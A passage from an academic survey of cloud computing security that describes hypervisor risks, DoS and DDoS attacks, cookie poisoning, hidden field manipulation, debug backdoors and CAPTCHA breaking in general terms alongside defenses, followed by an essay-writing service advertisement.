broadcast wrongly about the IPs associated with it. In such

case, the actual traffic gets routed to some IP other than the

intended one. Hence, data is leaked or reaches to some other

unintended destination. A security system for autonomous

systems has been explained in [78].

5.3 Application Level Security

Application level security refers to the usage of software and

hardware resources to provide security to applications such

that the attackers are not able to get control over these

applications and make desirable changes to their format. Now

a days, attacks are launched, being disguised as a trusted user

and the system considering them as a trusted user, allows full

access to the attacking party and gets victimized. The reason

behind this is that the outdated network level security policies

allow only the authorized users to access the specific IP

address. With the technological advancement, these security

policies have become obsolete as there have been instances

when the system’s security has been breached, having

accessed the system in the disguise of a trusted user. With the

recent technological advancements, it is quite possible to

imitate a trusted user and corrupt entire data without being

noticed.

Hence, it is essential to install higher level of security checks

to minimize these risks. The traditional methods to deal with

increased security issues have been to develop a task oriented

ASIC device which can handle a specific task, providing

greater levels of security with high performance [79]. But with

application-level threats being dynamic and adaptable to the

security checks in place, these closed systems have been

observed to be slow in comparison to the open ended systems.

The capabilities of a closed system as well as the adaptability

of an open ended system have been incorporated to develop

the security platforms based on Check Point Open

Performance Architecture using Quad Core Intel Xeon

Processors [79]. Even in the virtual environment, companies

like VMware etc. are using Intel Virtualization technology for

better performance and security base. It has been observed

that more often websites are secured at the network level and

have strong security measures but there may be security

loopholes at the application level which may allow

information access to unauthorized users. The threats to

application level security include XSS attacks, Cookie

Poisoning, Hidden field manipulation, SQL injection attacks,

DoS attacks, Backdoor and Debug Options, CAPTCHA

Breaking etc. resulting from the unauthorized usage of the

applications.

5.3.1 Security Concerns with the Hypervisor

Cloud Computing rests mainly on the concept of

virtualization. In a virtualized world, hypervisor is defined as

a controller popularly known as virtual machine manager

(VMM) that allows multiple operating systems to be run on a

system at a time, providing the resources to each operating

system such that they do not interfere with each other.

As the number of operating systems running on a hardware

unit increase, the security issues concerned with those new

operating systems also need to be considered. Because

multiple operating systems would be running on a single

hardware platform, it is not possible to keep track of all such

systems and hence maintaining the security of the operating

systems is difficult. It may happen that a guest system tries to

run a malicious code on the host system and bring the system

down or take full control of the system and block access to

other guest operating systems [80].

It cannot be denied that there are risks associated with sharing

the same physical infrastructure between a set of multiple

users, even one being malicious can cause threats to the others

using the same infrastructure [81], and hence security with

respect to hypervisor is of great concern as all the guest

systems are controlled by it. If a hacker is able to get control

over the hypervisor, he can make changes to any of the guest

operating systems and get control over all the data passing

through the hypervisor.

Various types of attacks can be launched by targeting different

components of the hypervisor [82]. Based on the

understanding of how the various components in the

hypervisor architecture behave, an advanced cloud protections

system can be developed by monitoring the activities of the

guest VMs (Virtual Machines) and inter-communication

among the various infrastructure components [83, 84].

5.3.2 Denial of Service Attacks

A DoS attack is an attempt to make the services assigned to

the authorized users unavailable. In such an attack, the server

providing the service is flooded by a large number of requests

and hence the service becomes unavailable to the authorized

user. Sometimes, when we try to access a site we see that due

to overloading of the server with the requests to access the

site, we are unable to access the site and observe an error. This

happens when the number of requests that can be handled by a

server exceeds its capacity. The occurrence of a DoS attack

increases bandwidth consumption besides causing congestion,

making certain parts of the clouds inaccessible to the users.

Usage of an Intrusion Detection System (IDS) is the most

popular method of defence against this type of attacks [85]. A

defence federation is used in [31] for guarding against such

attacks. Each cloud is loaded with separate IDS. The different

intrusion detection systems work on the basis of information

exchange. In case a specific cloud is under attack, the cooperative

IDS alerts the whole system. A decision on

trustworthiness of a cloud is taken by voting, and the overall

system performance is not hampered.

5.3.3 Cookie Poisoning

It involves changing or modifying the contents of cookie to

have an unauthorized access to an application or to a webpage.

Cookies basically contain the user’s identity related

credentials and once these cookies are accessible, the content

of these cookies can be forged to impersonate an authorized

user. This can be avoided either by performing regular cookie

cleanup or implementing an encryption scheme for the cookie

data [71].

5.3.4 Hidden Field Manipulation

While accessing a web-page, there are certain fields that are

hidden and contain the page related information and basically

used by developers. However, these fields are highly prone to

attacks by hackers as they can be modified easily and posted

on the web-page. This may result in severe security violations

[86].

5.3.5 Backdoor and Debug Options

A common practice by the developers is to enable the debug

option while publishing a web-site. This enables them to make

developmental changes in the code and get them implemented

in the web-site. Since these debug options facilitate back-end

entry to the developers, and sometimes these debug options

are left enabled unnoticed, this may provide an easy entry to a

hacker into the web-site that let him make changes at the website

level [87].

5.3.6 Distributed Denial of Service Attacks

DDoS may be called an advanced version of DoS in terms of

denying the important services running on a server by

flooding the destination sever with large numbers of packets

such that the target server is not able to handle it. In DDoS the

attack is relayed from different dynamic networks which have

already been compromised unlike the DoS attack. The

attackers have the power to control the flow of information by

allowing some information available at certain times. Thus the

amount and type of information available for public usage is

clearly under the control of the attacker [87].

The DDoS attack is run by three functional units: A Master, A

Slave and A Victim. Master being the attack launcher is

behind all these attacks causing DDoS, Slave is the network

which acts like a launch pad for the Master. It provides the

platform to the Master to launch the attack on the Victim.

Hence it is also called as co-ordinated attack.

Basically a DDoS attack is operational in two stages: the first

one being Intrusion phase where the Master tries to

compromise less important machines to support in flooding

the more important one. The next one is installing DDoS tools

and attacking the victim server or machine. Hence, a DDoS

attack results in making the service unavailable to the

authorized user similar to the way it is done in a DoS attack

but different in the way it is launched. A similar case of

Distributed Denial of Service attack was experienced with

CNN news channel website leaving most of its users unable to

access the site for a period of three hours [88].

In general, the approaches used to fight the DDoS attack

involve extensive modification of the underlying network.

These modifications often become costly for the users. [87]

proposed a swarm based logic for guarding against the DDoS

attack. This logic provides a transparent transport layer,

through which the common protocols such as HTTP, SMTP,

etc. can pass easily. The use of IDS in the virtual machine is

proposed in [16] to protect the cloud from DDoS attacks. A

SNORT like intrusion detection mechanism is loaded onto the

virtual machine for sniffing all traffics, either incoming, or

outgoing. Another method commonly used to guard against

DDoS is to have intrusion detection systems on all the

physical machines which contain the user’s virtual machines

[89]. This scheme had been shown to perform reasonably well

in a Eucalyptus [90] cloud.

5.3.7 CAPTCHA Breaking

CAPTCHAs were developed in order to prevent the usage of

internet resources by bots or computers. They are used to

prevent spam and overexploitation of network resources by

bots. Even multiple web-site registrations, dictionary attacks

etc. by an automated program are prevented using a

CAPTCHA.

But recently, it has been found that the spammers are able to

break the CAPTCHA [91], provided by the Hotmail and Gmail

service providers. They make use of the audio system

able to read the CAPTCHA characters for the visually

impaired users and use speech to text conversion software to

defeat the test. In yet another instant of CAPTCHA Breaking,

it was found that the net users are provided some form of



rev

Our Service Portfolio

jb

Want To Place An Order Quickly?

Then shoot us a message on Whatsapp, WeChat or Gmail. We are available 24/7 to assist you.

whatsapp

Do not panic, you are at the right place

jb

Visit Our essay writting help page to get all the details and guidence on availing our assiatance service.

Get 20% Discount, Now
£19 £14/ Per Page
14 days delivery time

Our writting assistance service is undoubtedly one of the most affordable writting assistance services and we have highly qualified professionls to help you with your work. So what are you waiting for, click below to order now.

Get An Instant Quote

ORDER TODAY!

Our experts are ready to assist you, call us to get a free quote or order now to get succeed in your academics writing.

Get a Free Quote Order Now